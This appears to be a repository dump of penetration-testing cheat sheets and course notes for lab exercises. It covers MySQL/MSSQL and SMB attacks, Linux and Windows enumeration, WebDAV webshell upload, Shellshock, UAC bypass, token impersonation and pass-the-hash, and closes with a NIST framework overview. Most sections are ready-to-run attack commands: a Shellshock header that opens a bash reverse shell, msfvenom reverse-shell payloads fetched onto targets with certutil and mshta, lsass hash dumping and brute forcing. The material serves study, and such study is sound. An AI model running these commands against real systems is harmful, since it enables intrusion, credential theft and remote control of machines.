-p 3306 84 | # Executes a custom SQL query on the remote MySQL server. 85 | 86 | ``` 87 | 88 | **MSSQL Nmap Scripts** 89 | 90 | ```shell 91 | nmap --script ms-sql-info -p 1433 92 | # Gathers information about the Microsoft SQL Server, including version and configuration. 93 | 94 | nmap --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 95 | # Extracts NTLM information from the SQL Server for fingerprinting and domain details. 96 | 97 | nmap --script ms-sql-brute --script-args userdb=,passdb= -p 1433 98 | # Performs brute-force attack on MS-SQL Server using provided username and password lists. 99 | 100 | nmap --script ms-sql-query --script-args="mssql.username=admin,mssql.password=pass,ms-sql-query.query='SELECT * FROM master..syslogins'" -p 1433 101 | # Executes a custom SQL query on the target SQL Server using given credentials. 102 | 103 | nmap --script ms-sql-xp-cmdshell --script-args="mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell.cmd='ipconfig'" -p 1433 104 | # Runs a Windows system command on the SQL Server via xp_cmdshell stored procedure. 105 | 106 | nmap --script ms-sql-xp-cmdshell --script-args="mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell.cmd='type c:\flag.txt'" -p 1433 107 | # Uses xp_cmdshell to read the contents of a file on the SQL Server (e.g., for CTF flags). 108 | 109 | ``` 110 | 111 |
112 | 113 | # Exploitation 114 | 115 | **MySQL Exploitation** 116 | 117 | ```shell 118 | use exploit/multi/mysql/mysql_udf_payload 119 | # Exploits MySQL by uploading a malicious UDF (User Defined Function) to achieve remote code execution. 120 | # Requires valid MySQL credentials and file write permissions. 121 | set FORCE_UDF_UPLOAD true 122 | set target 1 # 1 = Linux target 123 | ``` 124 | 125 | **MSSQL Exploitation** 126 | 127 | ```shell 128 | # If xp_cmdshell is enabled 129 | use auxiliary/admin/mssql/mssql_exec 130 | # Executes a system command on the SQL Server using xp_cmdshell. 131 | set CMD ipconfig 132 | 133 | use exploit/windows/mssql/mssql_clr_payload # related to MSSQL 2012 134 | # Uses a custom CLR assembly to gain code execution on the SQL Server. 135 | set PAYLOAD windows/x64/meterpreter/reverse_tcp 136 | 137 | # Dump hashes from MSSQL 138 | use auxiliary/admin/mssql/mssql_enum_sql_logins 139 | # Enumerates SQL Server logins and password hashes. 140 | 141 | use auxiliary/admin/mssql/mssql_enum_domain_accounts 142 | # Lists domain accounts the SQL Server can see or interact with. 143 | 144 | use auxiliary/admin/mssql/mssql_sql 145 | # Executes arbitrary SQL queries on the SQL Server. 146 | ``` 147 | -------------------------------------------------------------------------------- /Cheat-Sheets/Enumeration - Linux.md: -------------------------------------------------------------------------------- 1 | # Metasploit Modules 2 | 3 | ```shell 4 | post/linux/gather/enum_configs 5 | # Gathers configuration files from the target Linux system that may contain sensitive information. 6 | 7 | post/multi/gather/env 8 | # Collects environment variables from the target session, which may include credentials, paths, and system configuration. 9 | 10 | post/linux/gather/enum_network 11 | # Enumerates detailed network configuration, interfaces, routes, and DNS settings on the target Linux machine. 12 | 13 | post/linux/gather/enum_protections 14 | # Identifies security mechanisms in place on the target Linux system, such as SELinux, AppArmor, and hardening configs. 15 | 16 | post/linux/gather/enum_system 17 | # Collects general system information including OS version, kernel details, and system architecture. 18 | 19 | post/linux/gather/checkcontainer 20 | # Detects if the current session is running inside a containerized environment like Docker or LXC. 21 | 22 | post/linux/gather/checkvm 23 | # Checks if the target system is running inside a virtual machine (e.g., VMware, VirtualBox, QEMU). 24 | 25 | post/linux/gather/enum_users_history 26 | # Extracts user shell histories (like .bash_history) to uncover commands previously executed by users. 27 | 28 | use post/multi/manage/system_session 29 | # This module is used to elevate a Meterpreter session to SYSTEM-level privileges, if possible, on the target machine. 30 | set SESSION 1 31 | set TYPE python 32 | set HANDLER true 33 | set LHOST 34 | run 35 | 36 | # OTHER 37 | # Now, let’s create a bash file which will create a user on the target machine by uploading a test.sh file and execute it. 38 | # test.sh file 39 | useradd hacker 40 | useradd test 41 | useradd nick 42 | 43 | # Run the Apache server on the attacker’s machine and copy the test.sh file in the root folder. 44 | /etc/init.d/apache2 start 45 | cp test.sh /var/www/html 46 | 47 | use post/linux/manage/download_exec 48 | set URL http://192.216.221.2/test.sh 49 | set SESSION 1 50 | run 51 | 52 | # Let’s verify it by interacting with the session. 53 | sessions -i 1 54 | cat /etc/passwd 55 | ``` 56 | 57 |
58 | 59 | # Enumeration with LinEnum 60 | 61 | ```shell 62 | # You will need to copy the content of the script in raw format and paste it into a text file 63 | # We can now navigate back to our meterpreter session and navigate to the tmp drive by running the following command 64 | cd /tmp 65 | upload /root/Desktop/LinEnum.sh 66 | shell 67 | /bin/bash -i 68 | chmod +x LinEnum.sh 69 | ./LinEnum.sh 70 | ``` 71 | 72 |
73 | 74 | # System Info 75 | 76 | ```shell 77 | # Enumerate the Linux distribution and the OS architecture 78 | sysinfo 79 | 80 | # We can enumerate the hostname of the system by spawning a shell session 81 | hostname 82 | 83 | # We can also identify the Linux distro name and release version manually 84 | cat /etc/issue 85 | cat /etc/*release 86 | 87 | # Version of the Linux kernel 88 | uname -a 89 | uname -r 90 | 91 | # Identify hardware information regarding the CPU being used on the target system 92 | lscpu 93 | 94 | # List of storage devices attached to the Linux system 95 | df -h 96 | 97 | # Enumerate environment variable for a specific user, useful for privilege escalation part 98 | env 99 | # The PATH=/usr/local/sbin: .... The PATH environement specifies the directory that is used by default whenever you type a command or rather for binaries. 100 | 101 | # Installed software or packages 102 | dpkg -l 103 | 104 | # Checking the shells available on the system 105 | cat /etc/shells 106 | 107 | # Check the permissions each shell has 108 | cat /etc/shells | while read shell; do ls -l $shell 2>/dev/null; done 109 | # Loops through all valid shell paths listed in /etc/shells and displays their permissions if they exist. 110 | # Useful for checking which shells are present and executable on the system. 111 | # We can use any shell with the permission lrwxrwxrwx for escalation. 112 | ``` 113 | 114 |
115 | 116 | # Users and Groups 117 | 118 | ```shell 119 | # Enumerate the current user 120 | getuid 121 | 122 | # We can also obtain the same information manually 123 | whoami 124 | 125 | # We can enumerate the groups that the root user is a part of 126 | groups 127 | 128 | # List of other user and service accounts 129 | cat /etc/passwd 130 | # This command displays all user accounts on a Linux system except those that are not allowed to log in 131 | cat /etc/passwd | grep -v /nologin 132 | 133 | cat /etc/group 134 | # Displays the contents of the /etc/group file, which stores group account information in Linux 135 | 136 | # Add bob to root group 137 | usermod -aG root bob 138 | groups bob 139 | 140 | # We can view the users that are currently logged in 141 | who -w 142 | last 143 | lastlog 144 | ``` 145 | 146 |
147 | 148 | # Network Information 149 | 150 | ```shell 151 | # Check network interfaces on the target system 152 | ifconfig 153 | ip a # Alternative to ifconfig, shows detailed info for each interface 154 | 155 | # Check current active connections (e.g., Meterpreter reverse shell on port 4433) 156 | netstat 157 | 158 | # View the routing table for the target 159 | route 160 | 161 | # Basic system network info 162 | cat /etc/networks # Network names 163 | cat /etc/hostname # Hostname of the machine 164 | cat /etc/hosts # Local hostname-to-IP mapping 165 | cat /etc/resolv.conf # DNS server configuration 166 | 167 | # List ARP table to see devices the target has communicated with (may not be installed) 168 | arp -a 169 | # Use Meterpreter's ARP command to list the ARP cache from the target 170 | arp # Shows IP-to-MAC mappings of known network hosts 171 | ``` 172 | 173 |
174 | 175 | # Process & Services 176 | 177 | ```shell 178 | # List of running processes on the target system 179 | ps 180 | 181 | # We can also find the PID of a specific service 182 | pgrep vsftpd 183 | 184 | # We can enumerate the list of cron jobs on the Kali Linux system 185 | crontab -l 186 | ls -al /etc/cron* 187 | cat /etc/cron* 188 | ``` 189 | 190 | -------------------------------------------------------------------------------- /Course-Notes/04. Vulnerability Assessment.md: -------------------------------------------------------------------------------- 1 | # Vulnerability Assessment 2 | 3 |
4 | 5 | The Vulnerability Assessment course is designed for penetration testers and cybersecurity practitioners looking to enhance their ability to identify and evaluate security weaknesses in networks, applications, and systems. 6 | 7 |
8 | 9 | ## 1. WebDAV Vulnerabilities 10 | 11 | **Davtest is a WebDAV scanner** that sends exploit files to the WebDAV server and automatically creates the directory and uploads different format types of files. The tool also tried to execute uploaded files and gives us an output of successfully executed files. 12 | **Cadaver** is a tool for WebDAV clients, which supports a command-line style interface. It supports operations such as uploading files, editing, moving, etc. 13 | 14 | **Objective**: Exploit the WebDAV service and retrieve the flag! 15 | 16 | The following username and password may be used to access the service: 17 | - **Username**: bob 18 | - **Password**: password_123321 19 | 20 | ```shell 21 | nmap -Pn -A 22 | nmap --script http-enum -sV -p 80 23 | # We have found the directory also received 401 error i.e Unauthorized. 24 | 25 | davtest -url http:///webdav 26 | # We can notice, /webdav path is secured with basic authentication. We have the credentials to access the /webdav path. 27 | 28 | davtest -auth bob:password_123321 -url http:///webdav 29 | # We can notice, we have uploaded almost all the important file types to the /webdav directory. Also, we can execute three types of files. i.e asp, text, and html. 30 | 31 | # Upload the .asp backdoor on the target machine to /webdav directory using cadaver utility. 32 | cadaver http:///webdav 33 | # Enter credentials: bob:password_123321 34 | 35 | # Uploading asp backdoor to the IIS web server in webdav directory. 36 | put /usr/share/webshells/asp/webshell.asp 37 | ls 38 | 39 | # Access the backdoor using the Firefox browser and enter the credentials: bob:password_123321. 40 | http:///webdav/webshell.asp 41 | 42 | # Now we can access the web page http://
/webshell.asp and run commands. 43 | whoami 44 | ipconfig 45 | dir C:\ 46 | type C:\flag.txt 47 | ``` 48 | 49 | > `ls -al /usr/share/webshells` 50 | > - This directory contains webshells, which are scripts that allow remote access to a web server after being uploaded. 51 | > - Webshells are typically small scripts written in languages like PHP, ASP, JSP, or Python. 52 | > - They are often used by attackers (or penetration testers) to gain remote access to a compromised web server. 53 | > - Example Contents: PHP Webshells (for PHP-based servers), ASP Webshells (for ASP.NET/IIS servers), JSP Webshells (for Java-based servers). 54 | 55 |
56 | 57 | ## 2. Shellshock 58 | 59 | **Shellshock** is a security vulnerability discovered in 2014 that affects the Unix Bash shell. It allows attackers to execute arbitrary code on a vulnerable system by exploiting how Bash handles environment variables, potentially leading to unauthorized access or control of the system. The Shellshock vulnerability affects **GNU Bash versions 1.14 through 4.3**, released prior to the discovery of the flaw in 2014. 60 | 61 | **Objective**: Exploit the vulnerability and execute arbitrary commands on the target machine. 62 | 63 | ```shell 64 | # Start Nmap and check if the target is vulnerable to Shellshock. 65 | nmap -Pn -sV 66 | curl 67 | 68 | # Check the line: xhttp.open("GET", "/gettime.cgi", true); 69 |
/gettime.cgi 70 | ``` 71 | 72 | A **CGI file** (Common Gateway Interface) is a script or program executed by a web server to generate dynamic content, such as processing form input, generating web pages, or handling requests. These scripts can be written in various programming languages, like Perl, Python, PHP, or Bash. 73 | 74 | ```shell 75 | # We note the presence of the CGI script.: xhttp.open("GET", "/gettime.cgi", true);. 76 | ls -al /usr/share/nmap/scripts | grep -e "shellshock" 77 | nmap --script-help "*shellshock*" 78 | 79 | # Visit: https://nmap.org/nsedoc/scripts/http-shellshock.html 80 | 81 | # We check if the script is vulnerable to Shellshock. 82 | nmap -sV --script http-shellshock --script-args uri=/gettime.cgi,cmd=ls 83 | nmap -sV --script http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 84 | ``` 85 | 86 | **Exploit with Metasploit** 87 | 88 | ```shell 89 | service postgresql start && msfconsole 90 | search shellshock 91 | use exploit/multi/http/apache_mod_cgi_bash_env_exec 92 | set RHOSTS 93 | set TARGETURI 94 | set LHOST 95 | exploit 96 | ``` 97 | 98 | **Exploit with Burp** 99 | 100 | ```shell 101 | # Activate the proxy using the extension in Firefox. 102 | # Open BurpSuite > Proxy > Intercept is on. 103 | # We are going to inject the special characters in User-Agent header. 104 | # Send to the repeater. 105 | User-Agent: () { :; } ; echo; echo; /bin/bash -c 'cat /etc/passwd' 106 | # Click send. 107 | # We can utilize bash to essencially connect to a listener on our Kali Linux. We can do this using netcat. 108 | nc -nvlp 109 | User-Agent: () { :; } ; echo; echo; /bin/bash -c 'bash -i >& dev/tcp// 0>&1' 110 | # We should get a reversal on our netcat listener. 111 | whoami 112 | cat /etc/*issue 113 | ``` 114 | 115 |
116 | 117 | ## 3. Scanning with WMAP 118 | 119 | The **[WMAP](https://www.offsec.com/metasploit-unleashed/wmap-web-scanner/)** extension is typically used to automate the process of performing web server enumeration and also automates the process of identifying misconfigurations and vulnerabilities on a web server. This tool is integrated with Metasploit and allows us to conduct web application scanning from within the Metasploit Framework. 120 | 121 | ```shell 122 | # STEP 1: In this case the target IP is my IP plus one 123 | ifconfig 124 | 125 | # STEP 2: Start Metasploit 126 | # This launches the Metasploit Framework. Ensure PostgreSQL is running in the background. 127 | service postgresql start && msfconsole 128 | 129 | # STEP 3: Load the WMAP extension 130 | # WMAP is used to perform web application assessments inside Metasploit. 131 | load wmap 132 | 133 | # STEP 4: Register the web application host 134 | # This adds the target IP as a "site" for WMAP to analyze. 135 | wmap_sites -a 136 | 137 | # STEP 5: Add a specific URL as the scan target 138 | # This defines the protocol + IP or domain for the actual scan. 139 | wmap_targets -t http:// 140 | 141 | # STEP 6: Verify the sites and targets are loaded correctly 142 | # These commands help ensure your setup is correct before running scans. 143 | wmap_sites -l 144 | wmap_targets -l 145 | 146 | # STEP 7: Run passive site traversal 147 | # This scans the site for links, pages, and parameters — like a crawler. 148 | # It does NOT test for vulnerabilities, just maps the site. 149 | wmap_run -t 150 | 151 | # STEP 8: Run active vulnerability scan 152 | # This performs actual vulnerability checks like XSS, SQLi, file upload issues, etc. 153 | wmap_run -e 154 | ``` 155 | -------------------------------------------------------------------------------- /Cheat-Sheets/Privilege Escalation - Windows.md: -------------------------------------------------------------------------------- 1 | # UAC Bypass - UACME 2 | 3 | **Description**: UACME is a post-exploitation tool that bypasses UAC by abusing trusted Windows components, allowing code execution with elevated privileges. It requires local admin rights. 4 | 5 | 1) Set up the listener 6 | 7 | ```shell 8 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > 'backdoor.exe' 9 | # We need to setup our multi handler to receive the connection once the payload is executed on the target 10 | use exploit/multi/handler 11 | set payload windows/meterpreter/reverse_tcp 12 | set LHOST 13 | set LPORT # The same configured above 14 | exploit 15 | ``` 16 | 17 | 2) Transfer Akagi 64 over to the target system 18 | 19 | ```shell 20 | # Back to the Meterpreter session (exit command from shell session) 21 | pwd 22 | cd C:\\Users\\admin\\AppData\\Local\\Temp 23 | upload /root/backdoor.exe 24 | upload /root/Desktop/tools/UACME/Akagi64.exe 25 | 26 | shell 27 | # If we want to execute backdoor.exe with administrative privileges we need to use method 23 28 | # Note: Please provide the full path of the backdoor executable 29 | Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe 30 | # Once we execute the above command we would expect a meterpreter session 31 | # We have successfully gained high privilege access 32 | # We can dump the user hashes 33 | pgrep lsass.exe 34 | migrate 35 | hashdump 36 | 37 | # Check now 38 | sysinfo 39 | getid 40 | getprivs # Now we have elevated privileges even though we have access to the main user 41 | ``` 42 | 43 |
44 | 45 | # UAC Bypass - Memory Injection (Metasploit) 46 | 47 | ```shell 48 | use exploit/windows/local/bypassuac_injection 49 | set SESSION 1 50 | set TARGET 1 51 | set PAYLOAD windows/x64/meterpreter/reverse_tcp 52 | exploit 53 | # Please note the explorer.exe arch is x64 bit, so later when we perform UAC bypass, we have to use x64 based meterpreter payload. 54 | getsystem 55 | getuid 56 | 57 | ps -S lsass.exe 58 | migrate 59 | 60 | hashdump 61 | ``` 62 | 63 |
64 | 65 | # Impersonate 66 | 67 | **Description**: Impersonation in Windows lets an attacker adopt another user's security context to act on their behalf. Tools like Incognito allow token impersonation for privilege escalation or lateral movement. 68 | The `getprivs` command lists all privileges assigned to the current user. Key privileges like `SeImpersonatePrivilege` can enable privilege escalation. 69 | 70 | ```shell 71 | getprivs 72 | # SeImpersonatePrivilege. This means that we can use this Meterpreter session to impersonate other available access tokens. 73 | ``` 74 | 75 | **Incognito** is a post-exploitation tool for token manipulation, enabling attackers to list, steal, and impersonate high-privilege user tokens. 76 | 77 | ```shell 78 | load incognito 79 | list_tokens -u 80 | impersonate_token "ATTACKDEFENSE\Administrator" 81 | 82 | getuid 83 | getprivs 84 | 85 | pgrep explorer 86 | migrate 87 | ``` 88 | 89 |
90 | 91 | # Searching For Password in Windows Configuration Files 92 | 93 | Unattended setup files like Unattend.xml or Autounattend.xml may contain plaintext credentials, which attackers can use for legitimate Windows authentication. 94 | - C:\Windows\Panther\Unattend.xml 95 | - C:\ Windows\Panther\Autounattend.xml 96 | 97 | ```shell 98 | # This payload will establish a reverse connection from the target machine back to the attacker's machine 99 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > payload.exe 100 | 101 | # Set up a simple HTTP server to host the payload. This allows the target system to download the payload from your machine 102 | python -m SimpleHTTPServer 80 103 | 104 | # Use certutil to download the payload from the attacker's HTTP server 105 | certutil -urlcache -f http:///payload.exe payload.exe 106 | 107 | # Prepare the Metasploit multi-handler to receive the reverse connection. Stop the web server and set up Metasploit 108 | use multi/handler 109 | set payload windows/x64/meterpreter/reverse_tcp 110 | set LPORT 1234 111 | set LHOST 112 | run # Starts listening for incoming connections 113 | 114 | # Once the target runs the payload, a Meterpreter session will open 115 | sysinfo 116 | 117 | # Search for sensitive configuration files on the target 118 | search -f Unattend.xml # This search might take some time depending on the system size 119 | 120 | # Navigate to the directory where 'Unattend.xml' is usually stored and download the configuration file containing potential credentials 121 | download unattend.xml 122 | 123 | # Extract and analyze potential plaintext credentials. View the contents of the file to locate sensitive information such as AutoLogon passwords. 124 | cat unattend.xml 125 | # Paste the Base64-encoded password found in the file into a new text file for decoding. 126 | vim password.txt 127 | # Decode the password from Base64 format to reveal the plaintext credentials. 128 | base64 -d password.txt 129 | 130 | # Validate the extracted credentials using PsExec. If the password hasn't been changed since installation, you can attempt authentication. 131 | # Use Impacket's PsExec tool to execute commands remotely on the compromised machine. 132 | psexec.py Administrator@ 133 | # Enter the decoded password. 134 | 135 | # Verify if you successfully gained administrative access. 136 | whoami # Should return "NT AUTHORITY\SYSTEM" if successful. 137 | ``` 138 | 139 |
140 | 141 | # PowerUp 142 | 143 | PowerUp.ps1 is a PowerShell script used to identify privilege escalation opportunities caused by Windows misconfigurations. It is part of the PowerSploit post-exploitation framework. 144 | 145 | ```shell 146 | # Target Machine 147 | cd .\Desktop\PowerSploit\Privesc\ # In this case PowerUp was provided 148 | ls 149 | 150 | # Import PowerUp.ps1 script and Invoke-PrivescAudit function 151 | powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" # PowerShell execution policy bypass 152 | # We can notice the Unattend.xml file present on the system 153 | # The file may contain encoded or plain-text credentials and other sensitive information 154 | cat C:\Windows\Panther\Unattend.xml 155 | 156 | # Decoding administrator password using Powershell 157 | $password='QWRtaW5AMTIz' 158 | $password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($password)) 159 | echo $password 160 | 161 | # We are running a command prompt as an administrator user using discovered credentials 162 | runas.exe /user:administrator cmd # Enter the password, e.g. Admin@123 163 | whoami 164 | # We are running cmd.exe as an administrator 165 | ``` 166 | 167 | **Kali Machine** 168 | 169 | ```shell 170 | # Running the hta_server module to gain the meterpreter shell 171 | msfconsole -q 172 | use exploit/windows/misc/hta_server 173 | exploit 174 | ``` 175 | 176 | **Target Machine** 177 | 178 | ```shell 179 | # Copy the generated payload i.e “http://10.10.31.2:8080/Bn75U0NL8ONS.hta” and run it on cmd.exe with mshta command to gain the meterpreter shell 180 | mshta.exe http://10.10.31.2:8080/Bn75U0NL8ONS.hta 181 | 182 | # We can expect a meterpreter shell. 183 | # Read the flag 184 | sessions -i 1 185 | cd C:\\Users\\Administrator\\Desktop 186 | dir 187 | cat flag.txt 188 | ``` 189 | 190 |
191 | 192 | # SeImpersonatePrivilege 193 | 194 | ```shell 195 | getsystem 196 | # We can use getsystem to elevate the privileges because if SeImpersonatePrivilege is present, getsystem is likely to succeed using Named Pipe Impersonation. 197 | ``` 198 | 199 |
200 | 201 | # Remove from Access Control List (ACL) 202 | 203 | ```shell 204 | # After gained access to the system 205 | # Let’s try to navigate to the flag directory, but we don’t have the necessary access permissions. 206 | 207 | # Let’s check the permissions using the command: 208 | icacls flag 209 | 210 | # So, as we can see, it has a deny permission for NT AUTHORITY\SYSTEM . Let's remove this restriction by using the command: 211 | icacls flag /remove:d "NT AUTHORITY\SYSTEM" 212 | 213 | cd flag 214 | ``` 215 | -------------------------------------------------------------------------------- /Cheat-Sheets/SMB - SAMBA.md: -------------------------------------------------------------------------------- 1 | # SMB - SAMBA 2 | 3 | **SMB (Server Message Block)** 4 | **Description**: Protocol for file and printer sharing across a network, mostly used by Windows systems 5 | **Ports**: TCP 445 (modern), TCP 139 (older with NetBIOS) 6 | **Known Vulnerabilities**: MS17-010 (EternalBlue), SMBGhost (CVE-2020-0796), SMBRelay, PrintNightmare (affects SMB printers) 7 | 8 | **Samba** 9 | **Description**: Open-source implementation of SMB protocol for Linux/Unix systems, allowing file/printer sharing with Windows networks 10 | **Ports**: TCP 445, TCP 139, UDP 137-138 (NetBIOS name service) 11 | **Known Vulnerabilities**: SambaCry (CVE-2017-7494), Remote code execution on misconfigured shares 12 | 13 |
14 | 15 | # Basic SMB Client Commands 16 | 17 | ```shell 18 | smbclient /// -N 19 | # Connects anonymously to the specified SMB share on the target (no username/password prompt). 20 | 21 | smbclient -L /// -U 22 | # Lists available SMB shares on the target using provided credentials. 23 | 24 | smbclient -L /// -N 25 | # Lists SMB shares anonymously (no password prompt). 26 | 27 | # Connects directly to a specific share 28 | smbclient /// -U 29 | # Connects to a specific share — supports commands like list, cd, get, put, exit. 30 | 31 | # Other enumeration 32 | rpcclient -U "" -N 33 | # Performs RPC queries anonymously (e.g., user and group enum). 34 | 35 | nmblookup -A 36 | # Resolves NetBIOS names and checks if the host is part of a domain or workgroup. 37 | 38 | # Before accessing any of the shares, check the permissions of each one 39 | crackmapexec smb -u -p --shares 40 | # Enumerates SMB shares and access rights using given credentials. 41 | ``` 42 | 43 |
44 | 45 | # Enumeration 46 | 47 | **smbmap** 48 | 49 | ```shell 50 | smbmap -u -p -H 51 | # Lists accessible SMB shares using credentials. 52 | 53 | smbmap -H -u guest -p "" -d . 54 | # Attempts guest login with blank password in the current domain. 55 | 56 | smbmap -H -u -p -x 'ipconfig' 57 | # Executes a command on the target system if write and execution permissions exist. 58 | 59 | smbmap -H -u -p -L 60 | # Lists available shares on the target. 61 | 62 | smbmap -H -u -p -r 'C$' 63 | # Recursively lists files in the C$ share. 64 | 65 | smbmap -H -u -p --upload '/root/backdoor' 'C$\backdoor' 66 | # Uploads a file to the specified SMB share path. 67 | 68 | smbmap -H -u -p --download 'C$\flag.txt' 69 | # Downloads a file from the specified SMB share path. 70 | ``` 71 | 72 | **enum4linux** 73 | 74 | ```shell 75 | enum4linux -a 76 | # Performs full SMB enumeration (users, shares, OS, groups, etc.). 77 | 78 | enum4linux -U 79 | # Enumerates users. 80 | 81 | enum4linux -u -p 82 | # Authenticated SMB enumeration. 83 | 84 | enum4linux -o 85 | # Gets OS version. 86 | 87 | enum4linux -U 88 | # Enumerates users (same as -U ); use -u -p for authenticated version. 89 | 90 | enum4linux -S 91 | # Enumerates SMB shares. 92 | 93 | enum4linux -G 94 | # Enumerates domain groups. 95 | 96 | enum4linux -i 97 | # Gets printer info. 98 | 99 | enum4linux -r -u "admin" -p "password" 100 | # Enumerates users via RID cycling (SIDs like S-1-22-1-1003). 101 | ``` 102 | 103 | **nmap** 104 | 105 | ```shell 106 | ls -al /usr/share/nmap/scripts | grep -e "smb" 107 | # Lists available SMB-related scripts in Nmap's script directory. 108 | 109 | nmap --script smb-os-discovery -p 445 110 | # Retrieves OS information via SMB. 111 | 112 | nmap -p 445 --script smb-protocols 113 | # Lists supported SMB protocol versions (e.g., SMBv1, SMBv2). 114 | 115 | nmap -p 445 --script smb-security-mode 116 | # Checks the SMB security level and authentication modes. 117 | 118 | nmap -p 445 --script smb-enum-users 119 | # Attempts to enumerate valid users via SMB. 120 | 121 | nmap -p 445 --script smb-enum-sessions --script-args smbusername=,smbpassword= 122 | # Lists active SMB sessions (requires valid credentials). 123 | 124 | nmap -p 445 --script smb-enum-shares 125 | # Lists shared folders available via SMB. 126 | 127 | nmap -p 445 --script smb-enum-shares,smb-ls --script-args smbusername=,smbpassword= 128 | # Lists shares and their contents (auth required). 129 | 130 | nmap -p 445 --script smb-server-stats --script-args smbusername=,smbpassword= 131 | # Retrieves server statistics like uptime, sessions, and files shared. 132 | 133 | nmap -p 445 --script smb-enum-domains --script-args smbusername=,smbpassword= 134 | # Enumerates Windows domains on the network. 135 | 136 | nmap -p 445 --script smb-enum-group --script-args smbusername=,smbpassword= 137 | # Lists groups and their members from the SMB service. 138 | ``` 139 | 140 |
141 | 142 | # Metasploit Auxiliary Modules 143 | 144 | ```shell 145 | use auxiliary/scanner/smb/smb_version 146 | # Detects the SMB version and gathers OS and server information. 147 | 148 | use auxiliary/scanner/smb/smb_enumusers 149 | # Enumerates users on the SMB server. 150 | 151 | use auxiliary/scanner/smb/smb_enumshares 152 | # Lists shared resources (shares) available on the SMB server. 153 | 154 | use auxiliary/scanner/smb/smb2 155 | # Checks if the target supports the SMBv2 protocol. 156 | 157 | use auxiliary/scanner/smb/smb_login 158 | # Attempts to authenticate to SMB using provided credentials. 159 | # set CreateSession true → Enables session creation before login (can help bypass some restrictions). 160 | 161 | use auxiliary/scanner/smb/pipe_auditor 162 | # Enumerates named pipes over SMB — useful for identifying accessible services and potential escalation vectors. 163 | ``` 164 | 165 |
166 | 167 | # Brute-force and Password Attack 168 | 169 | ```shell 170 | hydra -l -P smb 171 | # Performs SMB brute-force attack using Hydra with a specific username and a password wordlist. 172 | 173 | crackmapexec smb -u -p 174 | # Attempts to authenticate to SMB using CrackMapExec with one user and a password list (bruteforce). 175 | ``` 176 | 177 |
178 | 179 | # Exploiting Vulnerabilities 180 | 181 | ```shell 182 | # Exploit with psexec 183 | use exploit/windows/smb/psexec 184 | # Executes commands on the target system via SMB using valid credentials. 185 | # set payload windows/x64/meterpreter/reverse_tcp → 64-bit Meterpreter reverse shell. 186 | # set payload windows/meterpreter/reverse_tcp → 32-bit Meterpreter reverse shell. 187 | 188 | # Exploit MS17-010 (EternalBlue) 189 | use auxiliary/scanner/smb/smb_ms17_010 190 | # Scans for systems vulnerable to the EternalBlue exploit (MS17-010). 191 | 192 | use exploit/windows/smb/ms17_010_eternalblue 193 | # Exploits the MS17-010 vulnerability to gain remote code execution (typically results in a system-level shell). 194 | ``` 195 | 196 |
197 | 198 | # Linux Samba Exploits 199 | 200 | ```shell 201 | # Exploiting old Samba versions 202 | use exploit/linux/samba/is_known_pipename 203 | # Exploits a command execution vulnerability in Samba (CVE-2017-7494) using a known pipe name. 204 | 205 | # Other Samba versions (example: 3.0.20) 206 | search samba 3.0.20 207 | # Searches for exploits targeting Samba version 3.0.20. 208 | use exploit/multi/samba/usermap_script 209 | # Exploits Samba 3.0.20 (and similar) via a username map script injection vulnerability (CVE-2007-2447). 210 | ``` 211 | 212 |
213 | 214 | # Pass-the-Hash & PsExec Attack 215 | 216 | ```shell 217 | # Pass-the-Hash example 218 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d757ad173d2fc249ce19364fd64c8ec::: 219 | # NTLM hash format used for Pass-the-Hash attacks. 220 | # Hash to use: aad3b435b51404eeaad3b435b51404ee:0d757ad173d2fc249ce19364fd64c8ec 221 | 222 | # Python Impacket PsExec 223 | cp /usr/share/doc/python3-impacket/examples/psexec.py /root/Desktop 224 | # Copies the Impacket PsExec script to your Desktop. 225 | 226 | chmod +x psexec.py 227 | # Makes the script executable. 228 | 229 | python3 psexec.py Administrator@ 230 | # Runs PsExec to execute commands remotely — will prompt for password or allow hash injection if configured. 231 | ``` 232 | -------------------------------------------------------------------------------- /Course-Notes/05. Auditing Fundamentals.md: -------------------------------------------------------------------------------- 1 | # Auditing Fundamentals 2 | 3 |
4 | 5 | ## 1. Security Frameworks 6 | 7 | ### 1.1. NIST Cybersecurity Framework 8 | 9 | The [NIST Cybersecurity Framework (CSF)](https://www.nist.gov/cyberframework) is a voluntary framework developed by the **National Institute of Standards and Technology (NIST)** to help organizations manage and reduce cybersecurity risks. It provides a structured approach for organizations of all sizes and sectors to understand, manage, and mitigate their cybersecurity risks effectively. 10 | The NIST CSF was first released in February 2014, in response to Executive Order 13636 issued by President Obama, which called for the development of a framework to improve critical infrastructure cybersecurity. While initially focused on critical infrastructure, the framework is now widely used across various industries globally. 11 | The main goal of the NIST CSF is to provide a common language and systematic methodology to understand, communicate, and manage cybersecurity risks across different organizations. 12 | The NIST CSF is composed of three primary components: 13 | 1) **Framework Core:** This is the heart of the framework, consisting of five high-level functions that serve as the foundation for cybersecurity activities in an organization. These functions are: 14 | - **Identify:** Understand the organization’s cybersecurity risks, including asset management, business environment, governance, risk assessment, and risk management strategy. 15 | - **Protect:** Develop and implement appropriate safeguards to ensure the delivery of critical services. This includes access control, awareness and training, data security, information protection processes, and maintenance. 16 | - **Detect:** Implement appropriate activities to identify the occurrence of a cybersecurity event. This involves continuous monitoring, detection processes, and security event analysis. 17 | - **Respond:** Develop and implement the necessary actions to respond to detected cybersecurity incidents. This includes response planning, communications, analysis, mitigation, and improvements. 18 | - **Recover:** Implement activities to maintain plans for resilience and restore any capabilities or services that were impaired due to a cybersecurity event. This includes recovery planning, improvements, and communications. 19 | 2) **Implementation Tiers:** These tiers provide context on how an organization views cybersecurity risk and the processes in place to manage that risk. There are four tiers: 20 | - **Tier 1: Partial** 21 | - **Tier 2: Risk Informed** 22 | - **Tier 3: Repeatable** 23 | - **Tier 4: Adaptive** 24 | - Each tier represents a progression from informal, reactive approaches to well-established, proactive, and adaptive cybersecurity practices. 25 | 3) **Framework Profile:** A Profile represents the alignment of the Framework Core with the business requirements, risk tolerance, and resources of the organization. It helps organizations identify and prioritize opportunities for improving cybersecurity 